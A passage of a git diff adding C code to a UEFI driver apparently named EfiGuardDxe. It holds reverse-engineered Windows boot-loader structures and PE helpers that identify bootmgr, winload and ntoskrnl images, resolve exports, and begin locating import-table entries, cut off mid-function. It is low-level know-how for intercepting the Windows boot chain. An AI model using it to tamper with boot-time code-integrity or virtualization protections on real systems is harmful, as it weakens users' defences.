+ // out one after another.
+ //
+ VOID* AcpiTable;
+
+ //
+ // Size of override ACPI tables in bytes.
+ //
+ UINT32 AcpiTableSize;
+
+ //
+ // Various informational flags passed to OS via OS Loader.
+ //
+ struct {
+ //
+ // Variables describing the success of the previous boot - whether
+ // booting into the OS was successful, and whether the arc from boot to
+ // runtime to shutdown was successful. Various types of system crashes
+ // will cause one or both of these to be FALSE.
+ //
+ UINT32 LastBootSucceeded : 1;
+ UINT32 LastBootShutdown : 1;
+
+ //
+ // A flag indicating whether the platform supports access to IO ports.
+ //
+ UINT32 IoPortAccessSupported : 1;
+
+ //
+ // A flag indicating whether or not the boot debugger persisted
+ // through kernel initialization.
+ //
+ UINT32 BootDebuggerActive : 1;
+
+ //
+ // A flag indicating whether the system must enforce strong code
+ // guarantees.
+ //
+ UINT32 StrongCodeGuarantees : 1;
+
+ //
+ // A flag indicating whether the system must enforce hard strong code
+ // guarantees.
+ //
+ UINT32 HardStrongCodeGuarantees : 1;
+
+ //
+ // A flag indicating whether SID sharing disabled.
+ //
+ UINT32 SidSharingDisabled : 1;
+
+ //
+ // A flag indicating whether TPM was intialized successfully or not
+ // by the OS loader during boot.
+ //
+ UINT32 TpmInitialized : 1;
+
+ //
+ // A flag indicating whether the VSM code page has been configured and
+ // is usable.
+ //
+ UINT32 VsmConfigured : 1;
+
+ //
+ // A flag indicating whether IUM is enabled.
+ //
+ UINT32 IumEnabled : 1;
+
+ //
+ // A flag indicating whether we're booting from SMB
+ //
+ UINT32 IsSmbboot : 1;
+
+ //
+ // Below added in 10.0.14393.0
+ //
+ UINT32 BootLogEnabled : 1;
+
+ //
+ // Below added in 10.0.17134.0
+ //
+ UINT32 DriverVerifierEnabled : 1;
+
+ UINT32 Unused : 8;
+
+ UINT32 FeatureSimulations : 6;
+
+ UINT32 MicrocodeSelfHosting : 1;
+
+ UINT32 XhciLegacyHandoffSkip : 1;
+
+ //
+ // Below added in 10.0.17763.0
+ //
+ UINT32 DisableInsiderOptInHVCI : 1;
+
+ UINT32 MicrocodeMinVerSupported : 1;
+
+ UINT32 GpuIommuEnabled : 1;
+ } s;
+
+ //
+ // Loader runtime performance data.
+ //
+ // This was a pointer to LOADER_PERFORMANCE_DATA until 10.0.17763.0
+ //
+ LOADER_PERFORMANCE_DATA LoaderPerformanceData;
+
+ //
+ // Boot application persistent data.
+ //
+ LIST_ENTRY BootApplicationPersistentData;
+
+ //
+ // Windows Memory Diagnostic Test Results.
+ //
+ VOID* WmdTestResult;
+
+ //
+ // Boot entry identifier.
+ //
+ GUID BootIdentifier;
+
+ //
+ // The number of pages to reserve for the resume application to use as
+ // scratch space. This should correspond to the boot environment's memory
+ // footprint.
+ //
+ UINT32 ResumePages;
+
+ //
+ // The crash dump header, if present.
+ //
+ VOID* DumpHeader;
+
+ //
+ // Boot graphics context.
+ //
+ VOID* BgContext;
+
+ //
+ // NUMA node locality information and group assignment data.
+ //
+ VOID* NumaLocalityInfo;
+ VOID* NumaGroupAssignment;
+
+ //
+ // List of hives attached by loader
+ //
+ LIST_ENTRY AttachedHives;
+
+ //
+ // Number of entries in the MemoryCachingRequirements map.
+ //
+ UINT32 MemoryCachingRequirementsCount;
+
+ //
+ // List of MEMORY_CACHING_REQUIREMENTS for the system.
+ //
+ VOID* MemoryCachingRequirements;
+
+ //
+ // Result of the Boot entropy gathering.
+ //
+ BOOT_ENTROPY_LDR_RESULT BootEntropyResult;
+
+ //
+ // Computed ITC/TSC frequency of the BSP in hertz.
+ //
+ UINT64 ProcessorCounterFrequency;
+
+ //
+ // Hypervisor specific information.
+ //
+ LOADER_PARAMETER_HYPERVISOR_EXTENSION HypervisorExtension;
+
+ //
+ // Hardware configuration ID used to uniquelly identify the system.
+ //
+ GUID HardwareConfigurationId;
+
+ //
+ // List of HAL_EXTENSION_MODULE_ENTRY structures.
+ //
+ LIST_ENTRY HalExtensionModuleList;
+
+ //
+ // Contains most recent time from firmware, bootstat.dat and ntos build time.
+ //
+ LARGE_INTEGER SystemTime;
+
+ //
+ // Contains cycle counter timestamp at the time SystemTime value was read.
+ //
+ UINT64 TimeStampAtSystemTimeRead;
+
+ //
+ // Boot Flags that are passed to the SystemBootEnvironmentInformation class.
+ //
+ union {
+ UINT64 BootFlags;
+ struct {
+ UINT64 DbgMenuOsSelection : 1;
+ UINT64 DbgHiberBoot : 1;
+ UINT64 DbgSoftRestart : 1;
+ UINT64 DbgMeasuredLaunch : 1;
+ } s;
+ } u1;
+
+ //
+ // Internal only flags that are passed to the kernel.
+ //
+ union {
+ UINT64 InternalBootFlags;
+ struct {
+ UINT64 DbgUtcBootTime : 1;
+ UINT64 DbgRtcBootTime : 1;
+ UINT64 DbgNoLegacyServices : 1;
+ } s;
+ } u2;
+
+ //
+ // Pointer to the in-memory copy of the Wfs FP data.
+ //
+ VOID* WfsFPData;
+
+ //
+ // Size of Wfs FP data in bytes.
+ //
+ UINT32 WfsFPDataSize;
+
+ //
+ // Loader bugcheck parameters for the kernel or extensions to act upon
+ //
+ LOADER_BUGCHECK_PARAMETERS BugcheckParameters;
+
+ //
+ // API set schema data.
+ //
+ VOID* ApiSetSchema;
+ UINT32 ApiSetSchemaSize;
+ LIST_ENTRY ApiSetSchemaExtensions;
+
+ //
+ // The system's firmware version according to ACPI's FADT,
+ // SMBIOS's BIOS information table, and EFI's system table respectively.
+ //
+ UNICODE_STRING AcpiBiosVersion;
+ UNICODE_STRING SmbiosVersion;
+ UNICODE_STRING EfiVersion;
+
+ //
+ // Debugger Descriptor
+ //
+ struct _DEBUG_DEVICE_DESCRIPTOR *KdDebugDevice;
+
+ //
+ // EFI Offline crashdump configuration table.
+ //
+ OFFLINE_CRASHDUMP_CONFIGURATION_TABLE OfflineCrashdumpConfigurationTable;
+
+ //
+ // Manufacturing mode profile name.
+ //
+ UNICODE_STRING ManufacturingProfile;
+
+ //
+ // BBT Buffer to enable precise event based sampling.
+ //
+ VOID* BbtBuffer;
+
+ //
+ // Registry values to be passed to the kernel for calculation of Xsave Buffer Size on Intel platforms
+ //
+#if defined(_X86_) || defined (_AMD64_)
+ UINT64 XsaveAllowedFeatures;
+ UINT32 XsaveFlags;
+#endif
+
+ //
+ // Boot options used by the OS loader.
+ //
+ VOID* BootOptions;
+
+ //
+ // These fields were added and/or moved forward in 10.0.17763.0
+ //
+ UINT32 IumEnablement;
+ UINT32 IumPolicy;
+ INT32 IumStatus;
+
+ //
+ // Boot sequence tracking for reliability reporting.
+ //
+ UINT32 BootId;
+
+ //
+ // Code Integrity configuration.
+ //
+ PLOADER_PARAMETER_CI_EXTENSION CodeIntegrityData;
+ UINT32 CodeIntegrityDataSize;
+
+ LOADER_HIVE_RECOVERY_INFO SystemHiveRecoveryInfo;
+
+ //
+ // Below fields added in 10.0.14393.0
+ //
+ UINT32 SoftRestartCount;
+
+ INT64 SoftRestartTime;
+
+ VOID* HypercallCodeVa;
+
+ VOID* HalVirtualAddress;
+
+ UINT64 HalNumberOfBytes;
+
+ PLEAP_SECOND_DATA LeapSecondData;
+
+ UINT32 MajorRelease;
+
+ UINT32 Reserved1;
+
+ //
+ // Below fields added in 10.0.15063.0
+ //
+ CHAR8 NtBuildLab[224];
+
+ CHAR8 NtBuildLabEx[224];
+
+ LOADER_RESET_REASON ResetReason;
+
+ //
+ // Below field added in 10.0.17134.0
+ //
+ UINT32 MaxPciBusNumber;
+
+ //
+ // Below field added in 10.0.17763.0
+ //
+ UINT32 FeatureSettings;
+} LOADER_PARAMETER_EXTENSION, *PLOADER_PARAMETER_EXTENSION;
+
+struct _HEADLESS_LOADER_BLOCK;
+struct _SMBIOS_TABLE_HEADER;
+
+typedef struct _NETWORK_LOADER_BLOCK {
+
+ // Binary contents of the entire DHCP Acknowledgment
+ // packet received by PXE.
+ UINT8* DHCPServerACK;
+ UINT32 DHCPServerACKLength;
+
+ // Binary contents of the entire BINL Reply
+ // packet received by PXE.
+ UINT8* BootServerReplyPacket;
+ UINT32 BootServerReplyPacketLength;
+
+} NETWORK_LOADER_BLOCK, *PNETWORK_LOADER_BLOCK;
+
+typedef struct _VIRTUAL_EFI_RUNTIME_SERVICES {
+
+ //
+ // (Virtual) Entry points to each of the EFI Runtime services.
+ //
+ UINTN GetTime;
+ UINTN SetTime;
+ UINTN GetWakeupTime;
+ UINTN SetWakeupTime;
+ UINTN SetVirtualAddressMap;
+ UINTN ConvertPointer;
+ UINTN GetVariable;
+ UINTN GetNextVariableName;
+ UINTN SetVariable;
+ UINTN GetNextHighMonotonicCount;
+ UINTN ResetSystem;
+ UINTN UpdateCapsule;
+ UINTN QueryCapsuleCapabilities;
+ UINTN QueryVariableInfo;
+
+} VIRTUAL_EFI_RUNTIME_SERVICES, *PVIRTUAL_EFI_RUNTIME_SERVICES;
+
+typedef struct _EFI_FIRMWARE_INFORMATION {
+ UINT32 FirmwareVersion;
+ PVIRTUAL_EFI_RUNTIME_SERVICES VirtualEfiRuntimeServices;
+
+ //
+ // The return value from SetVirtualAddressMap call.
+ //
+ NTSTATUS SetVirtualAddressMapStatus;
+
+ //
+ // Number of mappings missed if any due to change in firmware
+ // runtime memory map (for debugging).
+ //
+ UINT32 MissedMappingsCount;
+
+ //
+ // The firmware resource list identifies firmware components that can
+ // be updated via WU.
+ //
+ LIST_ENTRY FirmwareResourceList;
+
+ //
+ // The EFI memory map.
+ //
+ VOID* EfiMemoryMap;
+ UINT32 EfiMemoryMapSize;
+ UINT32 EfiMemoryMapDescriptorSize;
+
+} EFI_FIRMWARE_INFORMATION, *PEFI_FIRMWARE_INFORMATION;
+
+typedef struct _PCAT_FIRMWARE_INFORMATION {
+ UINT32 PlaceHolder;
+} PCAT_FIRMWARE_INFORMATION, *PPCAT_FIRMWARE_INFORMATION;
+
+typedef struct _FIRMWARE_INFORMATION_LOADER_BLOCK {
+ struct {
+ //
+ // If set to TRUE, indicates that the system is running on EFI
+ // firmware.
+ //
+ UINT32 FirmwareTypeEfi: 1;
+
+ //
+ // A flag indicating whether EFI runtime service calls must be routed
+ // through IUM.
+ //
+ UINT32 EfiRuntimeUseIum: 1;
+
+ //
+ // A flag indicating whether EFI runtime code and data pages are
+ // separate and protected with RW or RX protections.
+ //
+ //UINT32 EfiRuntimePageProtectionEnabled: 1; // This was removed again in 10.0.14393.0
+
+ //
+ // A flag indicating whether the firmware supports code and data page
+ // separation with restricted protections.
+ //
+ UINT32 EfiRuntimePageProtectionSupported: 1;
+
+#if defined (_ARM64_)
+ //
+ // If set to TRUE, indicates that the system EFI was started in EL2
+ // and therefore has something running there (hypervisor/microvisor).
+ // Also, this is where APs will start (EL2), and need to be directed
+ // to EL1 properly before they can start in the HLOS.
+ //
+ UINT32 FirmwareStartedInEL2: 1;
+ UINT32 Reserved: 28;
+#else
+ UINT32 Reserved: 29;
+#endif
+ } s;
+
+ union {
+ EFI_FIRMWARE_INFORMATION EfiInformation;
+ PCAT_FIRMWARE_INFORMATION PcatInformation;
+ } u;
+
+} FIRMWARE_INFORMATION_LOADER_BLOCK, *PFIRMWARE_INFORMATION_LOADER_BLOCK;
+
+//
+// I'd just like to interject for a moment... without this the next struct won't compile.
+// Source: kernel PDBs once in a blue moon
+//
+typedef struct _KLDR_DATA_TABLE_ENTRY {
+ LIST_ENTRY InLoadOrderLinks;
+ VOID* ExceptionTable;
+ UINT32 ExceptionTableSize;
+ VOID* GpValue;
+ struct _NON_PAGED_DEBUG_INFO* NonPagedDebugInfo;
+ VOID* DllBase;
+ VOID* EntryPoint;
+ UINT32 SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ UINT32 Flags;
+ UINT16 LoadCount;
+ union {
+ struct {
+ UINT16 SignatureLevel : 4;
+ UINT16 SignatureType : 3;
+ UINT16 Unused : 9;
+ } s;
+ UINT16 EntireField;
+ } u;
+ VOID* SectionPointer;
+ UINT32 CheckSum;
+ UINT32 CoverageSectionSize;
+ VOID* CoverageSection;
+ VOID* LoadedImports;
+ VOID* Spare;
+
+ // Below fields are Win 10+ only
+ UINT32 SizeOfImageNotRounded;
+ UINT32 TimeDateStamp;
+} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
+
+//
+// Boot loader data table entry. Each of the load lists in the parameter block
+// consist of boot loader data table entries.
+//
+// N.B. This structure requires ntldr.h to have been included.
+//
+#define BLDR_FLAGS_CORE_DRIVER_DEPENDENT_DLL 0x00000001
+#define BLDR_FLAGS_CORE_EXTENSION_DEPENDENT_DLL 0x00000002
+
+typedef struct _BLDR_DATA_TABLE_ENTRY {
+ KLDR_DATA_TABLE_ENTRY KldrEntry;
+ UNICODE_STRING CertificatePublisher;
+ UNICODE_STRING CertificateIssuer;
+ VOID* ImageHash;
+ VOID* CertificateThumbprint;
+ UINT32 ImageHashAlgorithm;
+ UINT32 ThumbprintHashAlgorithm;
+ UINT32 ImageHashLength;
+ UINT32 CertificateThumbprintLength;
+ UINT32 LoadInformation;
+ UINT32 Flags;
+} BLDR_DATA_TABLE_ENTRY, *PBLDR_DATA_TABLE_ENTRY;
+
+#define OSLOADER_SECURITY_VERSION_CURRENT 1
+
+typedef struct _LOADER_PARAMETER_BLOCK {
+ UINT32 OsMajorVersion;
+ UINT32 OsMinorVersion;
+ UINT32 Size;
+ UINT32 OsLoaderSecurityVersion;
+ LIST_ENTRY LoadOrderListHead;
+ LIST_ENTRY MemoryDescriptorListHead;
+
+ //
+ // Define the Core, TPM Core and Core Extensions driver lists. The
+ // lists are organized as follows:
+ //
+ // 1. Core Drivers: This list consists of drivers that ELAM drivers and
+ // 3rd party Core Extensions depend upon (e.g. WDF, CNG.sys). All
+ // drivers in this group should be MS-supplied and thus MS-signed.
+ //
+ // 2. ELAM drivers. This list consists of 3rd party ELAM drivers. These
+ // drivers need to be signed with ELAM certificate.
+ //
+ // 3. Core Extensions: This list consists of 3rd party drivers (viz.
+ // Platform Extensions and Tree drivers) that TPM Core drivers
+ // depend upon. These drivers need to be signed with Core Extension
+ // certificate.
+ //
+ // 4. TPM Core: This list consists of TPM driver and bus drivers (e.g.
+ // ACPI, PCI) that are necessary to enumerate TPM. All drivers in
+ // this group should be MS-supplied and thus MS-signed.
+ //
+ // 5. Boot Driver: This list contains the rest of the boot drivers.
+ //
+ LIST_ENTRY BootDriverListHead;
+ LIST_ENTRY EarlyLaunchListHead;
+ LIST_ENTRY CoreDriverListHead;
+ LIST_ENTRY CoreExtensionsDriverListHead;
+ LIST_ENTRY TpmCoreDriverListHead;
+ UINTN KernelStack;
+ UINTN Prcb;
+ UINTN Process;
+ UINTN Thread;
+ UINT32 KernelStackSize;
+ UINT32 RegistryLength;
+ VOID* RegistryBase;
+ PCONFIGURATION_COMPONENT_DATA ConfigurationRoot;
+ CHAR8* ArcBootDeviceName;
+ CHAR8* ArcHalDeviceName;
+ CHAR8* NtBootPathName;
+ CHAR8* NtHalPathName;
+ CHAR8* LoadOptions;
+ PNLS_DATA_BLOCK NlsData;
+ PARC_DISK_INFORMATION ArcDiskInformation;
+ PLOADER_PARAMETER_EXTENSION Extension;
+ union {
+ I386_LOADER_BLOCK I386;
+ ARM_LOADER_BLOCK Arm;
+ } u;
+ FIRMWARE_INFORMATION_LOADER_BLOCK FirmwareInformation;
+
+ //
+ // Below added in 10.0.17134.0
+ //
+ CHAR8* OsBootstatPathName;
+ CHAR8* ArcOSDataDeviceName;
+ CHAR8* ArcWindowsSysPartName;
+} LOADER_PARAMETER_BLOCK, *PLOADER_PARAMETER_BLOCK;
+
+
+#define LHB_SYSTEM_HIVE 0x01
+#define LHB_BOOT_PARTITION 0x02
+#define LHB_SYSTEM_PARTITION 0x04
+#define LHB_ELAM_HIVE 0x08
+#define LHB_MOUNT_VOLATILE 0x10
+
+#define LHB_VALID_FLAGS (LHB_SYSTEM_HIVE | LHB_BOOT_PARTITION | LHB_SYSTEM_PARTITION | LHB_ELAM_HIVE | LHB_MOUNT_VOLATILE)
+
+typedef struct _LOADER_HIVE_BLOCK {
+ LIST_ENTRY Entry;
+ CHAR16* FilePath;
+ UINT32 Flags;
+ VOID* RegistryBase;
+ UINT32 RegistryLength;
+ CHAR16* RegistryName;
+ CHAR16* RegistryParent;
+ LOADER_HIVE_RECOVERY_INFO RecoveryInfo;
+} LOADER_HIVE_BLOCK, *PLOADER_HIVE_BLOCK;
+
+//
+// Source: ReactOS bl.h
+//
+typedef struct _BL_RETURN_ARGUMENTS {
+ UINT32 Version;
+ UINT32 Status;
+ UINT32 Flags;
+ UINT64 DataSize;
+ UINT64 DataPage;
+} BL_RETURN_ARGUMENTS, *PBL_RETURN_ARGUMENTS;
+
+typedef struct _BL_BCD_OPTION {
+ UINT32 Type;
+ UINT32 DataOffset;
+ UINT32 DataSize;
+ UINT32 ListOffset;
+ UINT32 NextEntryOffset;
+ UINT32 Empty;
+} BL_BCD_OPTION, *PBL_BCD_OPTION;
+
+typedef struct _BL_APPLICATION_ENTRY {
+ CHAR8 Signature[8];
+ UINT32 Flags;
+ EFI_GUID Guid;
+ UINT32 Unknown[4];
+ BL_BCD_OPTION BcdData;
+} BL_APPLICATION_ENTRY, *PBL_APPLICATION_ENTRY;
+
+typedef struct _BL_LOADED_APPLICATION_ENTRY {
+ UINT32 Flags;
+ EFI_GUID Guid;
+ PBL_BCD_OPTION BcdData;
+} BL_LOADED_APPLICATION_ENTRY, *PBL_LOADED_APPLICATION_ENTRY;
diff --git a/EfiGuardDxe/ntdef.h b/EfiGuardDxe/ntdef.h
new file mode 100644
index 0000000..62a38b8
--- /dev/null
+++ b/EfiGuardDxe/ntdef.h
@@ -0,0 +1,80 @@
+#pragma once
+
+//
+// Minimal version of ntdef.h to avoid a dependency on the WDK
+//
+
+// Ignore this file if either ntdef.h or winnt.h has already been included elsewhere
+#if !defined(_NTDEF_) && !defined(_WINNT_)
+
+// DebugLib.h (re)defines _DEBUG without checking if it has already been defined. So get it now
+#include <Library/DebugLib.h>
+
+// Get the correct CPU and (non-)debug defines for NT from UEFI if we don't have them already
+#if defined(MDE_CPU_X64)
+ #if !defined(_WIN64)
+ #define _WIN64
+ #endif
+ #if !defined(_AMD64_)
+ #define _AMD64_
+ #endif
+#elif defined(MDE_CPU_IA32)
+ #if !defined(_X86_)
+ #define _X86_
+ #endif
+#endif
+#if defined(EFI_DEBUG)
+ #if !defined(_DEBUG)
+ #define _DEBUG
+ #endif
+ #if !defined(DBG)
+ #define DBG 1
+ #endif
+#endif
+#if defined(MDEPKG_NDEBUG)
+ #if !defined(NDEBUG)
+ #define NDEBUG
+ #endif
+#endif
+
+// Defines
+#define ANYSIZE_ARRAY 1
+#define FIELD_OFFSET(Type, Field) ((INT32)(INTN)&(((Type *)0)->Field))
+#define MAKELANGID(Primary, Sub) ((((UINT16)(Sub)) << 10) | (UINT16)(Primary))
+#define LANG_NEUTRAL 0x00
+#define SUBLANG_NEUTRAL 0x00
+#define RTL_CONSTANT_STRING(s) \
+{ \
+ (sizeof(s) - sizeof((s)[0])), \
+ (sizeof(s)), \
+ (s) \
+}
+#define LOWORD(l) ((UINT16)(((UINTN)(l)) & 0xffff))
+#define HIWORD(l) ((UINT16)((((UINTN)(l)) >> 16) & 0xffff))
+#define LOBYTE(w) ((UINT8)(((UINTN)(w)) & 0xff))
+#define HIBYTE(w) ((UINT8)((((UINTN)(w)) >> 8) & 0xff))
+
+// Typedefs
+typedef INT32 NTSTATUS;
+
+typedef union _LARGE_INTEGER {
+ struct {
+ UINT32 LowPart;
+ INT32 HighPart;
+ } s;
+ struct {
+ UINT32 LowPart;
+ INT32 HighPart;
+ } u;
+ INT64 QuadPart;
+} LARGE_INTEGER;
+
+typedef struct _UNICODE_STRING {
+ UINT16 Length;
+ UINT16 MaximumLength;
+ CHAR16* Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+typedef CONST UNICODE_STRING *PCUNICODE_STRING;
+
+#endif // !defined(_NTDEF_) && !defined(_WINNT_)
diff --git a/EfiGuardDxe/pe.c b/EfiGuardDxe/pe.c
new file mode 100644
index 0000000..ef1edad
--- /dev/null
+++ b/EfiGuardDxe/pe.c
@@ -0,0 +1,502 @@
+#include "EfiGuardDxe.h"
+
+#include <Library/BaseLib.h>
+#include <Library/BaseMemoryLib.h>
+
+
+#define LDR_IS_DATAFILE(x) (((UINTN)(x)) & (UINTN)1)
+#define LDR_DATAFILE_TO_VIEW(x) ((VOID*)(((UINTN)(x)) & ~(UINTN)1))
+
+
+STATIC
+BOOLEAN
+EFIAPI
+RtlIsCanonicalAddress(
+ UINTN Address
+ )
+{
+#if defined(MDE_CPU_IA32)
+ // 32-bit mode only supports 4GB max, so limits are not an issue
+ return TRUE;
+#elif defined(MDE_CPU_X64)
+ // The most-significant 16 bits must be all 1 or all 0. (64 - 16) = 48bit linear address range.
+ // 0xFFFF800000000000 = Significant 16 bits set
+ // 0x0000800000000000 = 48th bit set
+ return (((Address & 0xFFFF800000000000) + 0x800000000000) & ~0x800000000000) == 0;
+#endif
+}
+
+PEFI_IMAGE_NT_HEADERS
+EFIAPI
+RtlpImageNtHeaderEx(
+ IN VOID* Base,
+ IN UINTN Size OPTIONAL
+ )
+{
+ CONST BOOLEAN RangeCheck = Size > 0;
+
+ if (RangeCheck && Size < sizeof(EFI_IMAGE_DOS_HEADER))
+ return NULL;
+ if (((PEFI_IMAGE_DOS_HEADER)Base)->e_magic != EFI_IMAGE_DOS_SIGNATURE)
+ return NULL;
+
+ CONST UINT32 e_lfanew = ((PEFI_IMAGE_DOS_HEADER)Base)->e_lfanew;
+ if (RangeCheck &&
+ (e_lfanew >= Size ||
+ e_lfanew >= (MAX_UINT32 - sizeof(EFI_IMAGE_NT_SIGNATURE) - sizeof(EFI_IMAGE_FILE_HEADER)) ||
+ e_lfanew + sizeof(EFI_IMAGE_NT_SIGNATURE) + sizeof(EFI_IMAGE_FILE_HEADER) >= Size))
+ {
+ return NULL;
+ }
+
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = (PEFI_IMAGE_NT_HEADERS)(((UINT8*)Base) + e_lfanew);
+
+ // On x64, verify this is a canonical address
+ if (!RtlIsCanonicalAddress((UINTN)NtHeaders))
+ return NULL;
+
+ if (NtHeaders->Signature != EFI_IMAGE_NT_SIGNATURE)
+ return NULL;
+
+ return NtHeaders;
+}
+
+INPUT_FILETYPE
+EFIAPI
+GetInputFileType(
+ IN UINT8* ImageBase,
+ IN UINTN ImageSize
+ )
+{
+ // The non-EFI bootmgr starts with a 16 bit real mode stub instead of the standard MZ header
+ if (*(UINT16*)ImageBase == 0xD5E9)
+ return Bootmgr;
+
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize);
+ if (NtHeaders == NULL)
+ return Unknown;
+
+ CONST UINT16 Subsystem = HEADER_FIELD(NtHeaders, Subsystem);
+ if (Subsystem == EFI_IMAGE_SUBSYSTEM_NATIVE)
+ return Ntoskrnl;
+
+ if (Subsystem == EFI_IMAGE_SUBSYSTEM_EFI_APPLICATION)
+ {
+ // Of the Windows loaders, only bootmgfw.efi has this subsystem type.
+ // Check for the BCD Bootmgr GUID, { 9DEA862C-5CDD-4E70-ACC1-F32B344D4795 }, which is present in bootmgfw/bootmgr (and on Win >= 8 also winload.[exe|efi])
+ CONST EFI_GUID BcdWindowsBootmgrGuid = { 0x9dea862c, 0x5cdd, 0x4e70, { 0xac, 0xc1, 0xf3, 0x2b, 0x34, 0x4d, 0x47, 0x95 } };
+ for (UINT8* Address = ImageBase; Address < ImageBase + ImageSize - sizeof(BcdWindowsBootmgrGuid); Address += sizeof(VOID*))
+ {
+ if (CompareGuid((CONST GUID*)Address, &BcdWindowsBootmgrGuid))
+ {
+ return BootmgfwEfi;
+ }
+ }
+
+ // Some other OS is being booted
+ return Unknown;
+ }
+
+ // All remaining known possibilities have subsystem 0x10 (Windows boot application)
+ if (Subsystem != EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION)
+ {
+ DEBUG((DEBUG_WARN, "Unknown subsystem type 0x%02X.\r\n", Subsystem));
+ return Unknown;
+ }
+
+ // Brute force scan .rsrc to check if this is either winload.efi or bootmgr.efi.
+ // We've already eliminated bootmgr and bootmgfw.efi as candidates, so there will be no false positives
+ UINT32 Size = 0;
+ EFI_IMAGE_RESOURCE_DIRECTORY *ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)
+ RtlpImageDirectoryEntryToDataEx(ImageBase,
+ TRUE,
+ EFI_IMAGE_DIRECTORY_ENTRY_RESOURCE,
+ &Size);
+ if (ResourceDirTable == NULL || Size == 0)
+ return Unknown;
+
+ for (UINT8* Address = (UINT8*)ResourceDirTable; Address < ImageBase + ImageSize - sizeof(L"OSLOADER.XSL"); Address += sizeof(CHAR16))
+ {
+ if (CompareMem(Address, L"BOOTMGR.XSL", sizeof(L"BOOTMGR.XSL") - sizeof(CHAR16)) == 0)
+ {
+ return BootmgrEfi;
+ }
+ if (CompareMem(Address, L"OSLOADER.XSL", sizeof(L"OSLOADER.XSL") - sizeof(CHAR16)) == 0)
+ {
+ return WinloadEfi;
+ }
+ }
+
+ // Any remaining images that could slip through here (SecConfig.efi, winresume.efi) are not relevant for us
+ return Unknown;
+}
+
+CONST CHAR16*
+EFIAPI
+FileTypeToString(
+ IN INPUT_FILETYPE FileType
+ )
+{
+ switch (FileType)
+ {
+ case Bootmgr:
+ return L"bootmgr";
+ case WinloadExe:
+ return L"winload.exe";
+ case BootmgfwEfi:
+ return L"bootmgfw.efi";
+ case BootmgrEfi:
+ return L"bootmgr.efi";
+ case WinloadEfi:
+ return L"winload.efi";
+ case Ntoskrnl:
+ return L"ntoskrnl.exe";
+ case Unknown:
+ default:
+ return L"<unknown>";
+ }
+}
+
+VOID*
+EFIAPI
+GetProcedureAddress(
+ IN UINTN DllBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN CHAR8* RoutineName
+ )
+{
+ if (DllBase == 0 || NtHeaders == NULL)
+ return NULL;
+
+ // Get the export directory RVA and size
+ CONST PEFI_IMAGE_DATA_DIRECTORY ImageDirectories = NtHeaders->OptionalHeader.DataDirectory;
+ CONST UINT32 ExportDirRva = ImageDirectories[EFI_IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
+ CONST UINT32 ExportDirSize = ImageDirectories[EFI_IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
+
+ // Read the export directory
+ CONST PEFI_IMAGE_EXPORT_DIRECTORY ExportDirectory = (PEFI_IMAGE_EXPORT_DIRECTORY)(DllBase + ExportDirRva);
+ CONST UINT32* AddressOfFunctions = (UINT32*)(DllBase + ExportDirectory->AddressOfFunctions);
+ CONST UINT16* AddressOfNameOrdinals = (UINT16*)(DllBase + ExportDirectory->AddressOfNameOrdinals);
+ CONST UINT32* AddressOfNames = (UINT32*)(DllBase + ExportDirectory->AddressOfNames);
+
+ // Look up the import name in the name table using a binary search
+ INT32 Low = 0;
+ INT32 Middle = 0;
+ INT32 High = ExportDirectory->NumberOfNames - 1;
+
+ while (High >= Low)
+ {
+ // Compute the next probe index and compare the import name
+ Middle = (Low + High) >> 1;
+ CONST INTN Result = AsciiStrCmp(RoutineName, (CHAR8*)(DllBase + AddressOfNames[Middle]));
+ if (Result < 0)
+ High = Middle - 1;
+ else if (Result > 0)
+ Low = Middle + 1;
+ else
+ break;
+ }
+
+ // If the high index is less than the low index, then a matching table entry
+ // was not found. Otherwise, get the ordinal number from the ordinal table
+ if (High < Low || Middle >= (INT32)ExportDirectory->NumberOfFunctions)
+ return NULL;
+ CONST UINT32 FunctionRva = AddressOfFunctions[AddressOfNameOrdinals[Middle]];
+ if (FunctionRva >= ExportDirRva && FunctionRva < ExportDirRva + ExportDirSize)
+ return NULL; // Ignore forward exports
+
+ return (VOID*)(DllBase + FunctionRva);
+}
+
+EFI_STATUS
+EFIAPI
+FindIATAddressForImport(
+ IN VOID* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN CONST CHAR8* ImportDllName,
+ IN CONST CHAR8* FunctionName,
+ OUT VOID **FunctionIATAddress
+ )
+{
+ *FunctionIATAddress = NULL;
+
+ // Get the import descriptor table
+ UINT32 ImportDirSize;
+ CONST PIMAGE_IMPORT_DESCRIPTOR DescriptorTable = (PIMAGE_IMPORT_DESCRIPTOR)
+ RtlpImageDirectoryEntryToDataEx(ImageBase,
+ TRUE,
+ EFI_IMAGE_DIRECTORY_ENTRY_IMPORT,
+ &ImportDirSize);
+ if (ImportDirSize == 0 || DescriptorTable == NULL)
+ return EFI_NOT_FOUND;
+
+ // Count the number of DLL import descriptors
+ PIMAGE_IMPORT_DESCRIPTOR Entry = DescriptorTable;
+ UINT32 DllCount;
+ for (DllCount = 0; Entry->u.OriginalFirstThunk != 0; ++DllCount)
+ {
+ Entry = (PIMAGE_IMPORT_DESCRIPTOR)((UINTN)(Entry) +
+ sizeof(IMAGE_IMPORT_DESCRIPTOR));
+ }
+
+ // Iterate over the import descriptors
+ for (UINT32 i = 0; i < DllCount; ++i)
+ {
+ // Is this the import descriptor for our DLL?
+ CONST PIMAGE_IMPORT_DESCRIPTOR Descriptor = &DescriptorTable[i];
+ CONST CHAR8* DllName = (CHAR8*)((UINTN)ImageBase + Descriptor->Name);
+ if (DllName == NULL || AsciiStriCmp(DllName, ImportDllName) != 0)
+ continue; // No - skip
+
+ // Get the thunk data using the OFT if available, otherwise use the FT
+ CONST VOID* ThunkData = (VOID*)((UINTN)ImageBase +
+ (Descriptor->u.OriginalFirstThunk != 0
+ ? Descriptor->u.OriginalFirstThunk
+ : Descriptor->FirstThunk));
+
+ // Iterate over the function imports
+ if (IMAGE64(NtHeaders))
+ {
